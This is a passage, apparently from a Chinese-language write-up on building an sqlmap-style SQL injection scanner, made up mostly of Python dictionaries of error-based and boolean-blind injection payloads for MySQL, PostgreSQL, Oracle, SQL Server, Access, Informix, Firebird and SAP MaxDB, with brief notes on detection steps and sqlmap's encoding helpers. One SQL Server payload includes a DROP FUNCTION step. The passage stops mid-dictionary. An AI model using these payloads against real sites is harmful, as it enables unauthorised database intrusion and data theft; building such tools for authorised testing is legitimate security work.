         'payload': " ,(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))"},
    'INJPAY_54':
        {'dbms': 'PostgreSQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " ,(CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC))"},
    'INJPAY_0':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))"},
    'INJPAY_1':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))"},
    'INJPAY_2':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))"},
    'INJPAY_3':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))"},
    'INJPAY_4':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))"},
    'INJPAY_5':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))"},
    'INJPAY_6':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)"},
    'INJPAY_7':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)"},
    'INJPAY_8':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))"},
    'INJPAY_9':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))"},
    'INJPAY_53':
        {'dbms': 'PostgreSQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " ,(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))"},
    'INJPAY_49':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " ,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)"},
    'INJPAY_48':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " ,(SELECT [RANDNUM] FROM (SELECT JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8))))x)"},
    'INJPAY_45':
        {'dbms': 'Firebird', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " (SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))"},
    'INJPAY_44':
        {'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " (SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)"},
    'INJPAY_47':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " ,(SELECT [RANDNUM] FROM (SELECT EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x)))s)"},
    'INJPAY_46':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " ,(SELECT [RANDNUM] FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))x)"},
    'INJPAY_41':
        {'dbms': 'PostgreSQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " (CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC))"},
    'INJPAY_40':
        {'dbms': 'PostgreSQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))"},
    'INJPAY_43':
        {'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " (SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')"},
    'INJPAY_42':
        {'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " (CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))"}

}

通过两步分别加载和验证:

  1. url链接+前缀+level1_payloads+后缀,访问请求,根据sql_error判断结果
  2. url链接+前缀+error_base_injection中的payload+后缀,访问请求,根据error_base_injection的grep匹配结果是否成功,就能证明error_base_injection中的dbms数据库类型存在注入

通过查看源码,发现sqlmap会对传入的参数进行编码,需要三个函数和一个设置一个系统默认值编码

UNICODE_ENCODING = "utf8"


# 注入参数字符串编码

def unicodeencode(value, encoding=None):
    """
    Returns 8-bit string representation of the supplied unicode value

    >>> unicodeencode(u'foobar')
    'foobar'
    """

    retVal = value
    if isinstance(value, unicode):
        try:
            retVal = value.encode(encoding or UNICODE_ENCODING)
        except UnicodeEncodeError:
            retVal = value.encode(UNICODE_ENCODING, "replace")
    return retVal


def utf8encode(value):
    """
    Returns 8-bit string representation of the supplied UTF-8 value

    >>> utf8encode(u'foobar')
    'foobar'
    """

    return unicodeencode(value, "utf-8")


def escaper(value):
    retVal = None
    try:
        retVal = "0x%s" % binascii.hexlify(value)
    except UnicodeEncodeError:
        retVal = "CONVERT(0x%s USING utf8)" % "".join("%.2x" % ord(_) for _ in utf8encode(value))
    return retVal

盲注型

第三步是加载盲注的payload,同样整理到字典里面了

'''
正请求payload  负请求comparsion
url1 代表?id=1
url2 代表?id=-100

在url1情况下: 本身页面就是对的
    LEVEL 1 代表正请求与原始页面一样,正请求与错误页面不一样,正请求与负请求页面不一样,负请求与原始页面不一样,负请求与错误页面可能一样(有waf就一样) -->存在注入
    LEVEL 2 代表正请求与原始页面不一样,正请求与错误页面可能不一样,正请求与负请求页面不一样,负请求与原始页面一样,负请求与错误页面不一样(有waf就一样)
    LEVEL 3 代表正请求与原始页面一样,正请求与错误页面不一样,正请求与负请求页面不一样,负请求与原始页面不一样,负请求与错误页面可能一样(有waf就一样)

在url2 情况下:本身页面就是错的
算了先不管这个了
    LEVEL 1 代表正请求与原始页面一样,正请求与错误页面可能不一样(有waf就一样),正请求与负请求页面一样,负请求与原始页面不一样,负请求与错误页面可能一样

RANDNUM #随机数字
ORIGVALUE#url中id对应值
RANDNUM1 # 随机数字+1
RANDSTR  # 随机字母
RANDNUM2 # 随机数字+2

'''
bool_blind_injection = {

    "INJPAY_27":
        {
            'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))',
            'dbms': 'Microsoft SQL Server',
            'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))',
            'level': '3'},
    "INJPAY_26":
        {
            'comparsion': ' and (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)',
            'dbms': 'PostgreSQL',
            'payload': ' and (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)',
            'level': '3'},
    "INJPAY_25":
        {
            'comparsion': ' and (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)',
            'dbms': 'PostgreSQL',
            'payload': ' and (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)',
            'level': '3'},
    "INJPAY_24":
        {'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))',
         'dbms': 'PostgreSQL',
         'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))',
         'level': '3'},
    "INJPAY_23":
        {'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))',
         'dbms': 'PostgreSQL',
         'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))',
         'level': '3'},
    "INJPAY_22":
        {'comparsion': ' and ([RANDNUM]=[RANDNUM1])*[ORIGVALUE]', 'dbms': 'MySQL',
         'payload': ' and ([RANDNUM]=[RANDNUM])*[ORIGVALUE]', 'level': '3'},
    "INJPAY_21":
        {'comparsion': ' and ([RANDNUM]=[RANDNUM1])*[RANDNUM1]', 'dbms': 'MySQL',
         'payload': ' and ([RANDNUM]=[RANDNUM])*[RANDNUM1]', 'level': '3'},
    "INJPAY_20":
        {'comparsion': ' and ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])', 'dbms': 'MySQL',
         'payload': ' and ELT([RANDNUM]=[RANDNUM],[ORIGVALUE])', 'level': '3'},
    "INJPAY_50":
        {'comparsion': ' HAVING [RANDNUM]=[RANDNUM1]', 'dbms': 'MySQL', 'payload': ' HAVING [RANDNUM]=[RANDNUM]',
         'level': '1'},
    "INJPAY_29":
        {
            'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)',
            'dbms': 'Oracle',
            'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)',
            'level': '3'},
    "INJPAY_28":
        {
            'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))',
            'dbms': 'Microsoft SQL Server',
            'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))',
            'level': '3'},
    "INJPAY_51":
        {
            'comparsion': ' ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)',
            'dbms': 'MySQL',
            'payload': ' ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)',
            'level': '1'},
    "INJPAY_38":
        {
            'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))',
            'dbms': 'MySQL',
            'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))',
            'level': '1'},
    "INJPAY_39":
        {'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))',
         'dbms': 'PostgreSQL', 'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END))',
         'level': '1'},
    "INJPAY_55":
        {
            'comparsion': ' ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)',
            'dbms': 'Microsoft SQL Server',
            'payload': ' ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)',
            'level': '1'},
    "INJPAY_58":
        {'comparsion': ' ;SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END', 'dbms': 'SAP MaxDB',
         'payload': ' ;SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END', 'level': '1'},
    "INJPAY_30":
        {
            'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)',
            'dbms': 'Oracle',
            'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)',
            'level': '3'},
    "INJPAY_31":
        {
            'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)',
            'dbms': 'Informix',
            'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)',
            'level': '3'},
    "INJPAY_32":
        {
            'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)',
            'dbms': 'Informix',
            'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)',
            'level': '3'},
    "INJPAY_33":
        {'comparsion': ' and IIF([RANDNUM]=[RANDNUM1],[RANDNUM],1/0)', 'dbms': 'Microsoft Access',
         'payload': ' and IIF([RANDNUM]=[RANDNUM],[RANDNUM],1/0)', 'level': '3'},
    "INJPAY_34":
        {'comparsion': ' and IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)', 'dbms': 'Microsoft Access',
         'payload': ' and IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)', 'level': '3'},
    "INJPAY_35":
        {
            'comparsion': ' and (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)',
            'dbms': 'MySQL',
            'payload': ' and (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)',
            'level': '3'},
    "INJPAY_36":
        {
            'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))',
            'dbms': 'MySQL',
            'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))',
            'level': '1'},
    "INJPAY_37":
        {
            'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))',
            'dbms': 'MySQL',
            'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))',
            'level': '1'},
    "INJPAY_12":
        {'comparsion': ' OR ([RANDNUM]=[RANDNUM1])*[RANDNUM1]', 'dbms': 'MySQL',
         'payload': ' OR ([RANDNUM]=[RANDNUM])*[RANDNUM1]', 'level': '2'},
    "INJPAY_13":
        {
            'comparsion': " AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL",
            'dbms': 'PostgreSQL',
            'payload': " AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL",
            'level': '1'},
    "INJPAY_10":
        {'comparsion': ' OR ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])', 'dbms': 'MySQL',
         'payload': ' OR ELT([RANDNUM]=[RANDNUM],[RANDNUM1])', 'level': '2'},
    "INJPAY_11":
        {'comparsion': ' AND ([RANDNUM]=[RANDNUM1])*[RANDNUM1]', 'dbms': 'MySQL',
         'payload': ' AND ([RANDNUM]=[RANDNUM])*[RANDNUM1]', 'level': '1'},
    "INJPAY_16":
        {
            'comparsion': ' OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL',
            'dbms': 'Oracle',
            'payload': ' OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL',
            'level': '2'},
    "INJPAY_17":
        {
            'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))',
            'dbms': 'MySQL',
            'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))',
            'level': '3'},
    "INJPAY_14":
        {
            'comparsion': " OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL",
            'dbms': 'PostgreSQL',
            'payload': " OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL",
            'level': '2'},
    "INJPAY_15":
        {
            'comparsion': ' AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL',
            'dbms': 'Oracle',
            'payload': ' AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL',
            'level': '1'},
    "INJPAY_18":
        {'comparsion': ' and MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])', 'dbms': 'MySQL',
         'payload': ' and MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE])', 'level': '3'},
    "INJPAY_19":
        {'comparsion': ' and ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])', 'dbms': 'MySQL',
         'payload': ' and ELT([RANDNUM]=[RANDNUM],[RANDNUM1])', 'level': '3'},
    "INJPAY_52":
        {'comparsion': ' ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)',
         'dbms': 'PostgreSQL',
         'payload': ' ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)', 'level': '1'},
    "INJPAY_56":
        {
            'comparsion': ' ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL',
            'dbms': 'Oracle',
            'payload': ' ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL',
            'level': '1'},
    "INJPAY_57":
        {'comparsion': ' ;IIF([RANDNUM]=[RANDNUM1],1,1/0)', 'dbms': 'Microsoft Access',
         'payload': ' ;IIF([RANDNUM]=[RANDNUM],1,1/0)', 'level': '1'},
    "INJPAY_54":
        {'comparsion': ' ;IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]',
         'dbms': 'Microsoft SQL Server',
         'payload': ' ;IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]', 'level': '1'},
    "INJPAY_1":
        {'comparsion': ' AND [RANDNUM]=[RANDNUM1]', 'dbms': 'MySQL', 'payload': ' AND [RANDNUM]=[RANDNUM]',
         'level': '1'},
    "INJPAY_2":
        {'comparsion': ' OR [RANDNUM]=[RANDNUM1]', 'dbms': 'MySQL', 'payload': ' OR [RANDNUM]=[RANDNUM]', 'level': '2'},
    "INJPAY_3":
        {'comparsion': ' OR NOT [RANDNUM]=[RANDNUM1]', 'dbms': 'MySQL', 'payload': ' OR NOT [RANDNUM]=[RANDNUM]',
         'level': '1'},
    "INJPAY_4":
        {'comparsion': ' AND [RANDNUM]=[RANDNUM1]', 'dbms': 'Microsoft Access', 'payload': ' AND [RANDNUM]=[RANDNUM]',
         'level': '1'},
    "INJPAY_5":
        {'comparsion': ' OR [RANDNUM]=[RANDNUM1]', 'dbms': 'Microsoft Access', 'payload': ' OR [RANDNUM]=[RANDNUM]',
         'level': '2'},
    "INJPAY_6":
        {'comparsion': ' RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))',
         'dbms': 'MySQL', 'payload': ' RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END))',
         'level': '1'},
    "INJPAY_7":
        {'comparsion': ' AND MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])', 'dbms': 'MySQL',
         'payload': ' AND MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])', 'level': '1'},
    "INJPAY_8":
        {'comparsion': ' OR MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])', 'dbms': 'MySQL',
         'payload': ' OR MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])', 'level': '2'},
    "INJPAY_9":
        {'comparsion': ' AND ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])', 'dbms': 'MySQL',
         'payload': ' AND ELT([RANDNUM]=[RANDNUM],[RANDNUM1])', 'level': '1'},
    "INJPAY_53":
        {
            'comparsion': ' ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1',
            'dbms': 'PostgreSQL',
            'payload': ' ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1',
            'level': '1'},
    "INJPAY_49":
        {'comparsion': ' ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)', 'dbms': 'SAP MaxDB',
         'payload': ' ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)', 'level': '1'},
    "INJPAY_48":
        {'comparsion': ' ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END)', 'dbms': 'SAP MaxDB',
         'payload': ' ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END)', 'level': '1'},
    "INJPAY_45":
        {
            'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)',
            'dbms': 'Oracle',
            'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)',
            'level': '1'},
    "INJPAY_44":
        {
            'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)',
            'dbms': 'Oracle',
            'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)',
            'level': '1'},
    "INJPAY_47":
        {'comparsion': ' ,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)', 'dbms': 'Microsoft Access',
         'payload': ' ,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)', 'level': '1'},
    "INJPAY_46":
        {'comparsion': ' ,IIF([RANDNUM]=[RANDNUM1],1,1/0)', 'dbms': 'Microsoft Access',
         'payload': ' ,IIF([RANDNUM]=[RANDNUM],1,1/0)', 'level': '1'},
    "INJPAY_41":
        {
            'comparsion': ' ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)',
            'dbms': 'PostgreSQL',
            'payload': ' ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)',
            'level': '1'},
    "INJPAY_40":
        {'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))',
         'dbms': 'PostgreSQL',
